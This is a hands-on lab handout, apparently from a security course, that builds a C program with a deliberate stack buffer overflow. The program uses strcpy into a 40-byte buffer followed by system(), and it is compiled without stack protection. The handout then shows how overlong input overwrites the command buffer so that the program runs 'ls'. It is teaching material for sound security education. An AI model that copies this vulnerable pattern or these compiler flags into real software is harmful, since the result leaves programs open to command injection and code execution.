In a Terminal window, execute this command:
Copy and paste in this code:nano buf.c
#include <string.h> #include <stdio.h> main(){ char name[200]; printf("What is your name?\n"); scanf("%s", name); bo(name, "uname -a"); } int bo(char *name, char *cmd){ char c[40]; char buffer[40]; printf("Name buffer address: %x\n", buffer); printf("Command buffer address: %x\n", c); strcpy(c, cmd); strcpy(buffer, name); printf("Goodbye, %s!\n", buffer); printf("Executing command: %s\n", c); fflush(stdout); system(c); }
Save the file with Ctrl+X, Y, Enter.
Execute this command to compile the code without modern protections against stack overflows, and with debugging symbols:
You should see compiler warnings, but no errors.gcc -g -fno-stack-protector -z execstack -o buf buf.c
Troubleshooting
If you see this error:fatal error: string.h: No such file or directoryThat means gcc is not properly installed, which was the case on my Kali 2017.3 machine.Execute this command to fix gcc:
apt install build-essential -y
Enter your first name when prompted to../buf
The program prints out the location of the Name buffer and the command buffer, says "Goodbye", and excutes the command "uname -a", as shown below.
Enter fifty 'A' characters instead of your name../buf
The program attempts to execute the command AAAAAAA, as shown below.
Enter:./buf
Enter ten 'A' characters, then ten 'B' characters, then ten 'C' characters, then ten 'D' characters, then ls./buf
The program executes the "ls" command, showing the files in your working directory, as shown below.
Hint
If spaces are annoying you, try using backslash to escape them.
For a good time, try this string:
0123456789012345678901234567890123456789ls
Posted: 1-6-16 by Sam Bowne
Last revised 2-28-16
ASLR disabling removed 3-31-16
URL changed to "direct" 1-19-17
gcc fix added 1-25-18
Minor language fixes 8-25-18
Updated for WCIL 5-22-19